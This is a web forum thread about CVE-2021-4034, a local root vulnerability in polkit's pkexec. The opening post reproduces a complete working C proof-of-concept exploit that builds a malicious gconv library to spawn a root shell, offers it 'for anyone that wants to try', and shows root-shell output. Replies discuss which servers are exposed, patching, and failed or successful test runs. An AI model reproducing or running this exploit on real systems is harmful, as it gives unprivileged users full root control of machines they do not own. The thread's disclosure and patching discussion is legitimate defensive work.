Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


CVE-2021-4034 - Polkitd privilege escalation (HIGH VULN)
New on LowEndTalk? Please Register and read our Community Rules.

CVE-2021-4034 - Polkitd privilege escalation (HIGH VULN)

FoxelVoxFoxelVox Member
edited January 26 in General

Hi LET community,

A new CVE has come to light in polkit's pkexec calls. It allows any user to become a root user:

The exploit is also given in the example, and it works unfortunately on my Ubuntu 20 machine;

[email protected]:~$ gcc test.c -o a
[email protected]:~$ ./a
[~] compile helper..
[~] maybe get shell now?
# id
uid=0(root) gid=0(root) groups=0(root),116(lxd),1010(randomuser)

Redhat/CentOS/Alma/etc CVE patch:

Debian/UB CVE patch:


For anyone that wants to try the exploit:

/*
 * blasty-vs-pkexec.c -- by blasty <[email protected]> 
 * ------------------------------------------------
 * PoC for CVE-2021-4034, shout out to Qualys
 *
 * ctf quality exploit
 *
 * bla bla irresponsible disclosure
 *
 * -- blasty // 2022-01-25
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>

void fatal(char *f) {
    perror(f);
    exit(-1);
}

void compile_so() {
    FILE *f = fopen("payload.c", "wb");
    if (f == NULL) {
        fatal("fopen");
    }

    char so_code[]=
        "#include <stdio.h>\n"
        "#include <stdlib.h>\n"
        "#include <unistd.h>\n"
        "void gconv() {\n"
        "  return;\n"
        "}\n"
        "void gconv_init() {\n"
        "  setuid(0); seteuid(0); setgid(0); setegid(0);\n"
        "  static char *a_argv[] = { \"sh\", NULL };\n"
        "  static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
        "  execve(\"/bin/sh\", a_argv, a_envp);\n"
        "  exit(0);\n"
        "}\n";

    fwrite(so_code, strlen(so_code), 1, f);
    fclose(f);

    system("gcc -o payload.so -shared -fPIC payload.c");
}

int main(int argc, char *argv[]) {
    struct stat st;
    char *a_argv[]={ NULL };
    char *a_envp[]={
        "lol",
        "PATH=GCONV_PATH=.",
        "LC_MESSAGES=en_US.UTF-8",
        "XAUTHORITY=../LOL",
        NULL
    };

    printf("[~] compile helper..\n");
    compile_so();

    if (stat("GCONV_PATH=.", &st) < 0) {
        if(mkdir("GCONV_PATH=.", 0777) < 0) {
            fatal("mkdir");
        }
        int fd = open("GCONV_PATH=./lol", O_CREAT|O_RDWR, 0777); 
        if (fd < 0) {
            fatal("open");
        }
        close(fd);
    }

    if (stat("lol", &st) < 0) {
        if(mkdir("lol", 0777) < 0) {
            fatal("mkdir");
        }
        FILE *fp = fopen("lol/gconv-modules", "wb");
        if(fp == NULL) {
            fatal("fopen");
        }
        fprintf(fp, "module  UTF-8//    INTERNAL    ../payload    2\n");
        fclose(fp);
    }

    printf("[~] maybe get shell now?\n");

    execve("/usr/bin/pkexec", a_argv, a_envp);
}

Comments

  • jsgjsg Member, Resident Benchmarker

    Lovely

    Thanked by 2FoxelVox bdl
  • - pkexec is installed by default on all major Linux distributions (we
      exploited Ubuntu, Debian, Fedora, CentOS, and other distributions are
      probably also exploitable);
    
    - pkexec is vulnerable since its creation, in May 2009 (commit c8c3d83,
      "Add a pkexec(1) command");
    
    - any unprivileged local user can exploit this vulnerability to obtain
      full root privileges;
    
    

    Wow.

    Thanked by 1FoxelVox
  • PulsedMediaPulsedMedia Member, Patron Provider

    That's quite epic :O

    Had to instantly check, no we do not have pkexec installed on our servers :)

    Thanked by 1FoxelVox
  • @PulsedMedia said:
    That's quite epic :O

    Had to instantly check, no we do not have pkexec installed on our servers :)

    Ah that's great to see :D ! I just updated and tested all my servers, patched 11/14 i own, quite a lot honestly. I'm surprised this isn't a higher CVE rating. yeah you can easily patch it without downtime but the impact can be extreme, because it's this easy to gain root access.

  • vovlervovler Member
    edited January 26

    I wonder if going with a minimal install would not include pkexec, making minimal be more secure than non-minimal version of the distro

  • There was another one just a few days ago https://sysdig.com/blog/cve-2022-0185-container-escape/

    Thanked by 1PulsedMedia
  • ariq01ariq01 Member
    edited January 26

    I've check into directadmin and cPanel (with cloudlinux version). Successfully Not compiled, since pkexec: command not found in user shell access.

    But it's successfully get into shell to my vps, maybe because this point

    - any unprivileged local user can exploit this vulnerability to obtain
      full root privileges;
    
  • raindog308raindog308 Administrator

    But where's the cool name a logo and web site?

    Heartbleed, Log4Shell, Spectre - vulnerabilities these days are expected to have a brand.

    I suggest...hmmm...maybe PolDancer.

  • PulsedMediaPulsedMedia Member, Patron Provider

    @ariq01 said:
    I've check into directadmin and cPanel (with cloudlinux version). Successfully compiled, but can't go to shell, since pkexec: command not found in user shell access.

    But it's successfully get into shell to my vps, maybe because this point

    - any unprivileged local user can exploit this vulnerability to obtain
    full root privileges;

    but did you check id once on that shell?

  • raindog308raindog308 Administrator

    @FoxelVox said: Debian/UB CVE patch:

    Just checked and none of my Debian 11 VMs are running polkit, or even have the package installed, and the exploit doesn't work tehre.

    My home Deb 11 systems are running polkitd and the exploit works there (just tested).

    I'm thinking you need to have a GUI running to have polkitd installed and vulnerable. Might be a Debian config quirk.

    At least I don't have to worry about my 12-year-old getting root. She would use ransomware to get a better phone.

    Thanked by 2FoxelVox PulsedMedia
  • @PulsedMedia said:
    but did you check id once on that shell?

    I mean, it's not compiled on cloudlinux.
    Here the result :

    [[email protected] test]$ gcc test.c -o a
    test.c: In function ‘compile_so’:
    test.c:42:9: warning: missing terminating " character [enabled by default]
    " static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL
    ^
    test.c:42:9: error: missing terminating " character
    test.c:43:1: error: expected ‘,’ or ‘;’ before ‘}’ token
    };\n"
    ^
    test.c:43:1: error: stray ‘\’ in program
    test.c:43:5: warning: missing terminating " character [enabled by default]
    };\n"
    ^
    test.c:43:1: error: missing terminating " character
    };\n"
    ^
    test.c:43:4: error: ‘n’ undeclared (first use in this function)
    };\n"
    ^
    test.c:43:4: note: each undeclared identifier is reported only once for each fun ction it appears in
    test.c:44:9: error: expected ‘;’ before string constant
    " execve(\"/bin/sh\", a_argv, a_envp);\n"

  • BoogeymanBoogeyman Member
    edited January 26

    Last year Qualys revealed similar kind of vulnerability in sudo that existed for almost a decade. They really like old things. Ops this is also from last year. CVE is 2021-4034.

  • darkimmortaldarkimmortal Member
    edited January 26

    @raindog308 said:

    @FoxelVox said: Debian/UB CVE patch:

    Just checked and none of my Debian 11 VMs are running polkit, or even have the package installed, and the exploit doesn't work tehre.

    My home Deb 11 systems are running polkitd and the exploit works there (just tested).

    I'm thinking you need to have a GUI running to have polkitd installed and vulnerable. Might be a Debian config quirk.

    At least I don't have to worry about my 12-year-old getting root. She would use ransomware to get a better phone.

    Libvirtd has a dependency on polkit in Debian. VMs might not be vulnerable but the host systems are. I don’t know why this dependency exists, but it is not just a GUI thing

  • NeoonNeoon Member
    edited January 26

    @babuum said:
    There was another one just a few days ago https://sysdig.com/blog/cve-2022-0185-container-escape/

    patch state: ✓ all applicable livepatch modules inserted
    Premium live patching indeed.

    • pkexec is vulnerable since its creation, in May 2009

    Excellent. Wonderful.

    Also Log4j has a companion now.

  • @jmaxwell said:
    Also Log4j has a companion now.

    Why?

  • @Neoon said:

    @babuum said:
    There was another one just a few days ago https://sysdig.com/blog/cve-2022-0185-container-escape/

    patch state: ✓ all applicable livepatch modules inserted
    Premium live patching indeed.

    We must be due for an Incredible Hulk tv show remake. I'd watch it just to see that bear look real and still thrown across the lake.

  • Shot2Shot2 Member

    Another instance of "if the attackers gain access to the Oval Office, they could do nasty things, omg"

  • Gcc has to be installed first.
    Learning the hard way that "install only what needed" on your server. Even if the unneeded application doesn't have bug, it can be used to exploit another app's bug.

  • AlwaysSkintAlwaysSkint Member
    edited January 28

    @NanoG6 said: "install only what's needed" on your server

    Better not use Ubuntu! ;) :p

    Thanked by 1TimboJones
  • jon617jon617 Member
    edited January 28

    Thanks for the exploit example, @FoxelVox

    I'm starting to see centos and ubuntu package mirrors getting package updates today. After updating, my CentOS 7 and Ubuntu 20 machines are no longer exploitable. I bet other distros also have updates today.

  • @NanoG6 said:
    Gcc has to be installed first.

    Why?

  • @babuum said:

    @NanoG6 said:
    Gcc has to be installed first.

    Why?

    because

    [[email protected] ~]$ ./cve 
    [~] compile helper..
    sh: gcc: command not found
    [~] maybe get shell now?
    GLib: Cannot convert message: Conversion from character set “UTF-8” to “ANSI_X3.4-1968” is not supported
    The value for environment variable XAUTHORITY contains suscipious content
    
    This incident has been reported.
    [[email protected] ~]$ id
    uid=1000(scylla) gid=1000(scylla) groups=1000(scylla)
    [[email protected] ~]$ 
    
  • @AlwaysSkint said:

    @NanoG6 said: "install only what's needed" on your server

    Better not use Ubuntu! ;) :p

    Well I'm using minimal CentOS, and the exploit unfortunately works. (not so minimal, because I had to install gcc first)

    Thanked by 1AlwaysSkint
  • nemnem Member, Host Rep

    @NanoG6 said:

    @babuum said:

    @NanoG6 said:
    Gcc has to be installed first.

    Why?

    because

    An attacker could always upload that compiled libary (payload.so) to a server. gcc is required in the PoC for thoroughness. pkexec should spit out help without any arguments but uses gconv to handle encoding, which can load a library, so gcc really doesn't have any part in how the exploit works.

    It's a nasty nasty exploit.

  • AlwaysSkintAlwaysSkint Member
    edited January 28

    @nem said: It's a nasty nasty exploit.

    Cue: 999 - Nasty, Nasty :)
    https://youtu.be/4NxXjEPqOls

  • jon617jon617 Member
    edited January 29

    @NanoG6 said: Well I'm using minimal CentOS, and the exploit unfortunately works.

    Yeah. My original thought was just remove polkit or get rid of its root sticky bit permission, but NetworkManager seemed to depend on it. Glad the package updates came so quickly.

  • @AlwaysSkint said:

    @nem said: It's a nasty nasty exploit.

    Cue: 999 - Nasty, Nasty :)
    https://youtu.be/4NxXjEPqOls

    Clicking on random yt link described as "Nasty, Nasty" is rarely a good idea. >:)

    Thanked by 1AlwaysSkint
Sign In or Register to comment.